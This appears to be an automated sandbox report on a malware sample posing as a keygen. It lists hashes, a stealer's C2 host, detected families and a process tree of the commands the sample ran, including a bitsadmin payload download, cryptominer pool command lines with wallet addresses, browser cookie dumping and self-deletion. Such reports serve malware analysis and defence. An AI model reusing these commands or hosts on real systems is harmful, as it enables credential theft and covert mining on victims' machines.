Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1514s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 05:25

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1332
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2760
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2672
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1944
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1240
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1108
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:412
                    • C:\Users\Admin\AppData\Roaming\thecthg
                      C:\Users\Admin\AppData\Roaming\thecthg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3656
                      • C:\Users\Admin\AppData\Roaming\thecthg
                        C:\Users\Admin\AppData\Roaming\thecthg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5420
                    • C:\Users\Admin\AppData\Roaming\baecthg
                      C:\Users\Admin\AppData\Roaming\baecthg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5392
                    • C:\Users\Admin\AppData\Roaming\thecthg
                      C:\Users\Admin\AppData\Roaming\thecthg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4304
                      • C:\Users\Admin\AppData\Roaming\thecthg
                        C:\Users\Admin\AppData\Roaming\thecthg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5400
                    • C:\Users\Admin\AppData\Roaming\baecthg
                      C:\Users\Admin\AppData\Roaming\baecthg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4948
                    • C:\Users\Admin\AppData\Roaming\thecthg
                      C:\Users\Admin\AppData\Roaming\thecthg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5788
                      • C:\Users\Admin\AppData\Roaming\thecthg
                        C:\Users\Admin\AppData\Roaming\thecthg
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:416
                    • C:\Users\Admin\AppData\Roaming\baecthg
                      C:\Users\Admin\AppData\Roaming\baecthg
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:576
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3876
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3564
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3860
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3712
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1776
                        • C:\Users\Admin\AppData\Local\Temp\is-9KCN3.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-9KCN3.tmp\Install.tmp" /SL5="$401B6,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1260
                          • C:\Users\Admin\AppData\Local\Temp\is-KJH1S.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-KJH1S.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1248
                            • C:\Program Files\Windows Defender Advanced Threat Protection\RWGXSUEFMR\ultramediaburner.exe
                              "C:\Program Files\Windows Defender Advanced Threat Protection\RWGXSUEFMR\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4156
                              • C:\Users\Admin\AppData\Local\Temp\is-AMAOB.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-AMAOB.tmp\ultramediaburner.tmp" /SL5="$401F2,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\RWGXSUEFMR\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4188
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4224
                            • C:\Users\Admin\AppData\Local\Temp\c6-feef4-da8-37fac-5a7e70b5823b6\Mipefupili.exe
                              "C:\Users\Admin\AppData\Local\Temp\c6-feef4-da8-37fac-5a7e70b5823b6\Mipefupili.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4268
                            • C:\Users\Admin\AppData\Local\Temp\ff-bdbe6-6d6-6b799-220e7fef2c998\Nedujaezhaera.exe
                              "C:\Users\Admin\AppData\Local\Temp\ff-bdbe6-6d6-6b799-220e7fef2c998\Nedujaezhaera.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4316
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\odm4sfuk.cft\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:636
                                • C:\Users\Admin\AppData\Local\Temp\odm4sfuk.cft\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\odm4sfuk.cft\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:860
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\es1eqo1h.vkp\google-game.exe & exit
                                6⤵
                                  PID:5036
                                  • C:\Users\Admin\AppData\Local\Temp\es1eqo1h.vkp\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\es1eqo1h.vkp\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5016
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:4488
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oylnnzwl.p30\md1_1eaf.exe & exit
                                  6⤵
                                    PID:3116
                                    • C:\Users\Admin\AppData\Local\Temp\oylnnzwl.p30\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\oylnnzwl.p30\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5568
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wbrllzsf.rh0\y1.exe & exit
                                    6⤵
                                      PID:5360
                                      • C:\Users\Admin\AppData\Local\Temp\wbrllzsf.rh0\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\wbrllzsf.rh0\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5648
                                        • C:\Users\Admin\AppData\Local\Temp\3YbK8Cxup5.exe
                                          "C:\Users\Admin\AppData\Local\Temp\3YbK8Cxup5.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:3784
                                          • C:\Users\Admin\AppData\Roaming\1619414570344.exe
                                            "C:\Users\Admin\AppData\Roaming\1619414570344.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619414570344.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:5536
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\3YbK8Cxup5.exe"
                                            9⤵
                                              PID:2172
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:3896
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\wbrllzsf.rh0\y1.exe"
                                            8⤵
                                              PID:5636
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:4432
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gi4sxjk5.2hn\askinstall39.exe & exit
                                          6⤵
                                            PID:5668
                                            • C:\Users\Admin\AppData\Local\Temp\gi4sxjk5.2hn\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\gi4sxjk5.2hn\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5868
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:3196
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5480
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcxpxpnc.0kn\inst.exe & exit
                                              6⤵
                                                PID:5892
                                                • C:\Users\Admin\AppData\Local\Temp\bcxpxpnc.0kn\inst.exe
                                                  C:\Users\Admin\AppData\Local\Temp\bcxpxpnc.0kn\inst.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4468
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5wblylm.nrf\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:6100
                                                  • C:\Users\Admin\AppData\Local\Temp\r5wblylm.nrf\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\r5wblylm.nrf\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:5136
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5440
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5128
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:4324
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5128
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:188
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5712
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:4636
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:1020
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pkMJyZMVh3DzPhiu -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:5280
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -puf2MfOCmKMwnJRv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:2264
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:5516
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2968
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:2696
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4740
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4120
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5272
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:2856
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              PID:5636
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:6124
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5368
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5536
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4852
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbBD7B.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:6084
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:1780
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\teys2tds.412\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:5436
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svqbvshq.uad\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5828
                                                                                      • C:\Users\Admin\AppData\Local\Temp\svqbvshq.uad\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\svqbvshq.uad\toolspab1.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:6116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svqbvshq.uad\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\svqbvshq.uad\toolspab1.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5816
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jazhbks.24z\c7ae36fa.exe & exit
                                                                                      6⤵
                                                                                        PID:5084
                                                                                        • C:\Users\Admin\AppData\Local\Temp\3jazhbks.24z\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\3jazhbks.24z\c7ae36fa.exe
                                                                                          7⤵
                                                                                            PID:5344
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\om02qrgb.cbs\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:6032
                                                                                            • C:\Users\Admin\AppData\Local\Temp\om02qrgb.cbs\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\om02qrgb.cbs\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5896
                                                                                              • C:\Users\Admin\AppData\Local\Temp\om02qrgb.cbs\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\om02qrgb.cbs\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2368
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4392
                                                                                    • C:\Users\Admin\AppData\Roaming\8284.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\8284.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5068
                                                                                      • C:\Users\Admin\AppData\Roaming\8284.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\8284.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:5276
                                                                                    • C:\Users\Admin\AppData\Roaming\8534.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\8534.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2316
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w30047@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:208
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w22138 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:4536
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:4128
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:4464
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4852
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:1428
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5948
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4176
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
